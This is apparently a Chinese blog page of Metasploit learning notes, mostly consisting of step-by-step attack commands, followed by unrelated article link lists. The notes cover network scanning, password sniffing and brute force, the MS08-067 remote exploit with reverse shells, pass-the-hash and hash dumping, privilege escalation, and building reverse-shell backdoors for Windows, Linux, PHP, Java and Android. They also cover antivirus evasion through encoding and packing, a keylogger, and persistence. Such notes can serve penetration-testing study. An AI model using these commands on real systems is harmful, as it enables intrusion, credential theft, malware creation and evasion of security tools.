-----------------第一季--------------------

启动Metasploit:msfconsole

升级和更新:./msfupdate

直接退出:exit 退回上一级:quit

1.端口扫描:

a.调用Nmap扫描

nmap -v -sV ip

b.调用msf模块扫描(1)

 use auxiliary/scanner/portscan/syn

 show options

 set INTERFACE 网卡

 set PORTS 端口

 set RHOSTS IP/24 (24是网路遮罩, 因为ipv4全长32个bit, 所以32-24=8, 也就是遮罩大小为2的8次方, 也就是256个ip可以使用)

 set THREADS 100

 run

2.SMB扫描_获取系统信息

 msfconsole

 use auxiliary/scanner/smb/smb_version

 show options

 set RHOST IP

(假如ip是192.168.1.1,要扫描多个ip可以set RHOS 192.168.1.1-200)

 set THREADS 10

 run

3.服务识别(ssh)

 msfconsole

 use auxiliary/scanner/ssh/ssh_version

 show options

 set RHOST IP

 run

服务识别(FTP)

 use auxiliary/scanner/ftp/ftp_version

 show options

 set FTPUSER

 set RHOST IP

 run

4.密码嗅探

 msfconsole

 use auxiliary/sniffer/psnuffle

 show options

 run

5.SNMP扫描与枚举

 msfconsole

 search snmp

 use auxiliary/scanner/snmp/snmp_login

 show options

 set RHOST IP

 set THREADS 10

 run

 use auxiliary/scanner/snmp/snmp_enum

 set RHOST IP

 set THREADS 10

 run

6.SMB登陆验证

 msfconsole

 use auxiliary/scanner/smb/smb_login

 show options

 set RHOST IP

 set SMBUser administrator

 set THREADS 100

 run

7.VNC身份验证

 msfconsole

 use auxiliary/scanner/vnc/vnc_none_auth

 show options

 set RHOST IP

 set THREADS 100

 run

8.WMAP Web扫描(http://www.2cto.com/article/201312/266601.htmls)

 msfconsole

 load wmap

 wmap_sites

 wmap_sites -a url

 wmap_sites -l

 wmap_targets -h

 wmap_targets -t url

 wmap_targets -l

 wmap_run -h

 wmap_run -t 

---------------第二季--------------
1.远程代码执行

 msfconsole

 search 08-067

 use exploit/windows/smb/ms08_067_netapi

 show options

 set RHOST IP

 show payloads

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST ip

 info(查看影响版本)

 用nmap查看目标服务器版本

 set target 编号

 show options(检查是否已经设置好)

 exploit

 shell

 net user admin admin /add

2.MJDJ文件解析远程代码执行

 msfconsole 

 search12-004

 use exploit/windows/browser/ms12_004_midi

 show options

 set SRVHOST IP

 exploit

 set URIPATH /

 show options

 set LPORT 1244

 show options

 exploit

 sessions

 sessions -i id

 

3.口令安全

 msfconsole

 serach msql_login(ssh_login,ftp_login)

 use auxiliary/scanner/mysql/mysql_login

 set RHOST IP

 set USERNAME root

 set PASS_FILE 字典路径

 set THREAD 50

 set options(check)

 exploit

4.hash值传递渗透

(相关文章_实例解析通过Metasploit来传递哈希值:http://netsecurity.51cto.com/art/201009/227795.htm)

 msfconsole

 use/windows/smb/psexec

 show options

 set RHOST IP

 set SMMBUSER 帐号

 show options

 exploit

 hashdump(获取hash值)

 exit

 set smbpass hash

 exploit

5.NDP内核提权

前提:必须有一个session

 serarch 14-002

 use  exploit/windows/local/ms_ndproxy

 show options

 set session 1(id)

 show options

 exploit

提权:getsystem

6.多种后门的生成
a.windows后门的生成

 msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=端口 X >123.exe

 search handler

 use exploit/mulit/handler

 show options

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST IP

 set LPORT 端口

 点击123.exe

b.linux后门的生成

 msfpayload linux/x86/shell_reverse_tcp LHOST=IP LPORT=端口 X >linux

 chmod 777 linux

 ls

 ./linux

c.java后门的生成

 msfpayload java/meterpreter/shell_reverse_tvp LHOST=IP LPORT=端口 W >123.jar

 

d.php后门的生成

 msfpayload java/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R | msfencode -e php/baes64 -t raw -o 123.php

上传到目标站-本地监听-目标访问服务器

e.安桌后门的生成

 msfpayload android/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R >1.apk

 目标运行1.apk

 本地监听

 

7.内网渗透

获得shell扫描c段

 run get_local_subnets 获取网卡

 run autoroute -s ip 扫描c段

劫持域管理

 use incognito

 impersonate_token 域

 shell

-----------------------

 use auxiliary/sniffer/psnuffle

 run

 

8.反反病毒(免杀)

 msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai - t exe>123.exe

------------------------------------------------------------------------------

 msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai -c 10 - t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe

-------------------------------------------------------------------------------

msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai - k -c 10

-----------------------------------------------------------------

upx -5 /1231.exe 加壳

 

9.不一样的xss(键盘记录)

 msfconsole

 search keylogger

 use auxiliary/server/capture/http_javascript_keyloger

 show options

 set DEMO true

 set URIPATH /

 set srvport 80

 run

10.维持访问

 msfconsole

 use exploit/multi/handler

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST IP

 SET LPORT 1111

 run

 run metsvs -A

-------------------------------------------

 use exploit/multi/handler

 set payload windows/meterpreter/metsvs_bind_tcp

 show options

 set LPORT 31337

 set RHOST IP

 exploit

 keyscan_start(键盘记录)

 keyscan_dump

羽翼metasploit第一,二季学习笔记的更多相关文章

  1. 《Linux内核设计与实现》 第一二章学习笔记

    <Linux内核设计与实现> 第一二章学习笔记 第一章 Linux内核简介 1.1 Unix的历史 Unix的特点 Unix很简洁,所提供的系统调用都有很明确的设计目的. Unix中一切皆 ...

  2. 《java编程思想(第四版)》第一二章学习笔记

    目录 一.Introduction 1.抽象过程 2.面向对象语言(包括Java)的五个基本特性 3.每个对象都提供服务 4.public.private.protected三者的区别 5.Java的 ...

  3. 《Linux内核设计与实现》第一、二章学习笔记

    <Linux内核设计与实现>第一.二章学习笔记 姓名:王玮怡  学号:20135116 第一章 Linux内核简介 一.关于Unix ——一个支持抢占式多任务.多线程.虚拟内存.换页.动态 ...

  4. 毕业设计 之 二 PHP学习笔记(一)

    毕业设计 之 二 PHP学习笔记(一) 作者:20135216 平台:windows10 软件:XAMPP,DreamWeaver 一.环境搭建 1.XAMPP下载安装 XAMPP是PHP.MySQL ...

  5. 学习笔记(三)--->《Java 8编程官方参考教程(第9版).pdf》:第十章到十二章学习笔记

    回到顶部 注:本文声明事项. 本博文整理者:刘军 本博文出自于: <Java8 编程官方参考教程>一书 声明:1:转载请标注出处.本文不得作为商业活动.若有违本之,则本人不负法律责任.违法 ...

  6. VBA二次学习笔记(1)——文件操作

    说明(2018-9-1 11:20:46): 1. 上班三个月了,累的一逼,真的是钱少事多离家远,每天早上六点起,晚上八点回.哎,少壮不努力啊! 2. 三个月没写博客了,上一篇已经是5.29的了,真的 ...

  7. 《Linux命令行与shell脚本编程大全》 第一、二章 学习笔记

    第一章:初识Linux shell Linux内核负责以下4个主要功能: 1.系统内存管理 2.软件程序管理 3.硬件设备管理 4.文件系统管理 1.系统内存管理 内核不仅管理服务器上的可用物理内存, ...

  8. 《Linux内核设计与实现》 第一、二章学习笔记

    第一章 Linux内核简介 一.Unix 1.Unix的特点 简洁 绝大部分东西都被当做文件对待.这种抽象使对数据和对设备的操作都是通过一套相同的系统调用借口来进行的:open(),read(),wr ...

  9. 《Linux内核设计与实现》第一二章读书笔记

    第一章 Linux内核简介 1.Unix简介 (一)概念:支持抢占式多任务.多进程.虚拟内存.换页.动态链接和TCP/IP网络的现代化操作系统. (二)Unix特点(层次化结构): Unix很简洁,仅 ...

随机推荐

  1. rpm 包的安装、卸载、升级、查询、验证

    关键字: rpm 强制卸载jdk rpm -e j2sdk1.4.2_04 强制覆盖安装jdk rpm -Uvh j2sdk-1_4_1_02-fcs-linux-i586.rpm --force - ...

  2. 面向对象编程之OC

    面向对象概述 面向对象是一种符合人类思想习惯的编程思想.现实生活中存在各种形态不同的事物,这些事物之间存在着各种各样的联系,在程序中使用对象来映射现实中的事物,使用对象的关系来描述事物之间的联系,这种 ...

  3. 怎样下载youtube的字幕

    第一步:安装chrome浏览器 第二步:安装Tampermonkey扩展. google.com的页面 第三步:使用下面两个链接安装(点进去后点击安装此脚本即可)脚本1,脚本2

  4. java线程学习之线程创建

    线程是程序控制的一个内部数据流.线程的状态转化如下 或者 在java中创建线程有两种方式: 1.实现runnable接口(这个比较好,推荐这个.原因是:用的时候比较灵活,相比较继承Thread类,用接 ...

  5. c#高级编程第七版 学习笔记 第三章 对象和类型

    第三章 对象和类型 本章的内容: 类和结构的区别 类成员 按值和按引用传送参数 方法重载 构造函数和静态构造函数 只读字段 部分类 静态类 Object类,其他类型都从该类派生而来 3.1 类和结构 ...

  6. Django常见问题集

    django2.0发行文档说,django2.0最后一个支持的是python3.4+... 所以,还在用python2.7的同学只能手动指定版本下载了 pip2 install django==1.8 ...

  7. P2053 [SCOI2007]修车(费用流)

    P2053 [SCOI2007]修车 顾客平均等待的最小时间$=$等待总时间$/n$ 考虑只有1个技术人员时,$n$辆车等待总时间 $A_1+(A_1+A_2)+(A_1+A_2+A_3)+...+\ ...

  8. CSS 文件引入

    CSS 文件引入 <html> <head> <!-- link标签引用其他文件.rel="stylesheet" 引用css.href=" ...

  9. D8 双连通分量

    记得有个梗那一天,zw学生zzh大佬说逃不掉的路变成a不掉的题哈哈哈哈: 分离的路径: BZOJ 1718POJ 3177LUOGU 286: 思路:在同一个边双连通分量中,任意两点都有至少两条独立路 ...

  10. [c/c++] programming之路(17)、高级指针

    一.二级指针 二级指针的作用:1.函数改变外部变量指针2.外挂改变一个指针的值 #include<stdio.h> #include<stdlib.h> void main() ...